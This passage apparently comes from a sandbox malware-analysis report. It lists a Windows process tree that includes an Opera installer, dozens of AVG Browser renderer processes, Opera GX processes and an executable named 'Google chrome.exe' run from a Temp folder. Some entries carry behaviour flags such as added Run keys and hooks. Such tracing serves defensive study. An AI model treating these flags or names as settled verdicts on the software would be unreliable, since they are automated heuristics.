I0LjAuMC4wIiwidXRtIjp7ImNhbXBhaWduIjoiRGlzcF9kaXNfY3B1IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vcGFydG5lciIsIm1lZGl1bSI6InBiIiwic2l0ZSI6Im9wZXJhX2NvbSIsInNvdXJjZSI6InNvZnRvbmljIn0sInV1aWQiOiJhYTgwMmI4Mi0yZTFhLTQzY2QtOGExOC04OWY2OGMwNGU2ZDgifQ== --desktopshortcut=1 --wait-for-package --initial-proc-handle=A8070000000000003⤵
- Enumerates connected drives
PID:1968 -
C:\Users\Admin\Downloads\OperaSetup.exeC:\Users\Admin\Downloads\OperaSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.35 --initial-client-data=0x2ac,0x2b0,0x2b4,0x280,0x2b8,0x675bf308,0x675bf314,0x675bf3204⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe"3⤵PID:7532
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\assistant_installer.exe" --version3⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405222013191\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.23 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x14030e8,0x14030f4,0x14031004⤵PID:11104
-
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --field-trial-handle=9688,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10004 /prefetch:12⤵PID:8772
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --field-trial-handle=3104,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9980 /prefetch:12⤵PID:7916
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --field-trial-handle=3172,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11828 /prefetch:12⤵
- Checks computer location settings
PID:10304
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --field-trial-handle=11860,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7336 /prefetch:12⤵
- Checks computer location settings
PID:11444
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --field-trial-handle=13084,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:12⤵PID:11172
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --field-trial-handle=9804,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13072 /prefetch:12⤵PID:9200
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --field-trial-handle=9960,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:12228
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --field-trial-handle=13344,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13432 /prefetch:12⤵PID:12920
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --field-trial-handle=13328,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13532 /prefetch:12⤵PID:4040
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --field-trial-handle=13392,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13572 /prefetch:12⤵PID:7420
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --field-trial-handle=13444,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13692 /prefetch:12⤵PID:7940
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --field-trial-handle=10160,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:12⤵PID:12332
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --field-trial-handle=10080,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12072 /prefetch:12⤵PID:11300
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --field-trial-handle=10576,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:12⤵PID:7412
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --field-trial-handle=11208,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6496 /prefetch:12⤵PID:6920
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --field-trial-handle=3132,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7032 /prefetch:12⤵PID:11436
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --field-trial-handle=13036,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7024 /prefetch:12⤵
- Checks computer location settings
PID:9124
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --field-trial-handle=11268,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5940 /prefetch:12⤵PID:1524
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --field-trial-handle=5076,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3020 /prefetch:12⤵PID:9084
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --field-trial-handle=6064,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5552 /prefetch:12⤵PID:2004
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=13252,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10768 /prefetch:82⤵PID:7284
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --field-trial-handle=6008,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8784 /prefetch:12⤵PID:5924
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --field-trial-handle=11752,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11792 /prefetch:12⤵PID:6396
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --field-trial-handle=9612,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:2424
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --field-trial-handle=11712,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11736 /prefetch:12⤵PID:4192
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --field-trial-handle=5156,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11784 /prefetch:12⤵PID:12500
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --field-trial-handle=8396,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11060 /prefetch:12⤵PID:7996
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --field-trial-handle=12628,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8640 /prefetch:12⤵PID:8452
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --field-trial-handle=8536,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8660 /prefetch:12⤵PID:9716
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --field-trial-handle=13676,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6896 /prefetch:12⤵PID:12116
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --field-trial-handle=13636,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12964 /prefetch:12⤵PID:10924
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --field-trial-handle=12820,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:7520
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --field-trial-handle=4476,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11496 /prefetch:12⤵PID:2000
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --field-trial-handle=7732,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11632 /prefetch:12⤵PID:8956
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --field-trial-handle=8708,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8672 /prefetch:12⤵PID:11448
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=159 --field-trial-handle=5904,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12064 /prefetch:12⤵PID:920
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=160 --field-trial-handle=8340,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:12⤵PID:5996
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6552,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3228 /prefetch:82⤵PID:5740
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7676,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13864 /prefetch:82⤵PID:9544
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2816,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13752 /prefetch:82⤵PID:1588
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11664,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11924 /prefetch:82⤵PID:8728
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7796,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=13756 /prefetch:82⤵PID:8044
-
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:5988
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:10096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s NgcSvc1⤵PID:8596
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:4932
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:10172
-
C:\Windows\system32\ctfmon.exectfmon.exe1⤵PID:5808
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:11116
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:11300
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s fdPHost1⤵PID:12128
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:10304
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "10304" "2336" "2320" "2332" "0" "0" "2340" "0" "0" "0" "0" "0"2⤵PID:12404
-
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:6772
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"1⤵PID:10424
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut2⤵PID:9408
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1d8,0x1e8,0x7ff9643261d0,0x7ff9643261e0,0x7ff9643261f03⤵PID:5996
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut --lowered-browser1⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Enumerates system info in registry
PID:4652 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9643261d0,0x7ff9643261e0,0x7ff9643261f02⤵PID:10220
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,16413686937848662577,11533833037627156515,262144 --variations-seed-version --mojo-platform-channel-handle=1776 /prefetch:22⤵PID:6552
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=1696,i,16413686937848662577,11533833037627156515,262144 --variations-seed-version --mojo-platform-channel-handle=1808 /prefetch:32⤵PID:8708
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2088,i,16413686937848662577,11533833037627156515,262144 --variations-seed-version --mojo-platform-channel-handle=1700 /prefetch:82⤵PID:9584
-
-
